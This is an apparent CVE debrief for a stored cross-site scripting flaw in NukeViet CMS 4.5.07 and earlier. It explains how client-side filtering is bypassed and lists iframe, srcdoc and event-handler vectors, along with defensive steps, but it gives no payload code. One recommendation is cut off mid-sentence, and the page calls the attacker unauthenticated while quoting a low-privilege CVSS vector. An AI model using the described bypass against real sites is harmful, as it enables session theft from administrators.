PatchSiren cyber security CVE debrief
CVE-2026-41147 nukeviet CVE debrief
NukeViet CMS versions 4.5.07 and prior contain a stored cross-site scripting (XSS) vulnerability in the Request class due to insufficient server-side input sanitization. The application relies primarily on client-side filtering to sanitize HTML tags and attributes, which can be bypassed by intercepting and modifying HTTP requests directly. An unauthenticated attacker can inject malicious payloads that are stored server-side and executed in browsers of users viewing the content, including administrators and moderators reviewing contact messages or comments. The vulnerability was demonstrated using the Contact module as a proof of concept. Potential impacts include session hijacking via cookie theft, unauthorized actions performed under victim identities, defacement, redirection to phishing pages, and phishing attacks through manipulated email notifications. The issue has been resolved in version 4.5.08.
- Vendor
- nukeviet
- Product
- Unknown
- CVSS
- HIGH 8.7
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-22
- Original CVE updated
- 2026-05-26
- Advisory published
- 2026-05-22
- Advisory updated
- 2026-05-26
Who should care
Organizations running NukeViet CMS versions 4.5.07 or earlier, particularly those with public-facing contact forms or comment functionality. Administrators and security teams responsible for web application security should prioritize patching. Developers maintaining NukeViet deployments or forks should review input handling implementations.
Technical summary
The vulnerability exists in the Request class of NukeViet CMS where insufficient server-side input sanitization allows stored XSS attacks. The application relies on client-side filtering which can be bypassed by direct HTTP request manipulation. Attackers can inject payloads that execute when administrators or other users view affected content. The fix in version 4.5.08 addresses the sanitization deficiency.
Defensive priority
HIGH
Recommended defensive actions
- Upgrade NukeViet CMS to version 4.5.08 or later to address the stored XSS vulnerability.
- If immediate upgrade is not possible, implement server-side HTML sanitization in the Request class to strip or encode dangerous tags and attributes including iframe elements, srcdoc attributes, and event handlers such as
- Enforce a Content Security Policy (CSP) to restrict inline script execution and reduce the impact of XSS attacks.
- Configure cookies with the HttpOnly flag to mitigate cookie theft via XSS attacks.
- Review and audit user-submitted content in contact messages, comments, and other input vectors for signs of compromise.
- Implement additional server-side validation for all user input rather than relying on client-side filtering alone.
Evidence notes
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The CVSS 3.1 vector is AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, indicating network attack vector, low attack complexity, low privileges required, user interaction required, changed scope, high confidentiality and integrity impact, and no availability impact. The vulnerability status in NVD is listed as 'Deferred'.
Official resources
CVE-2026-41147 was published on 2026-05-22 and last modified on 2026-05-26. The vulnerability affects NukeViet CMS versions 4.5.07 and prior. A fix is available in version 4.5.08.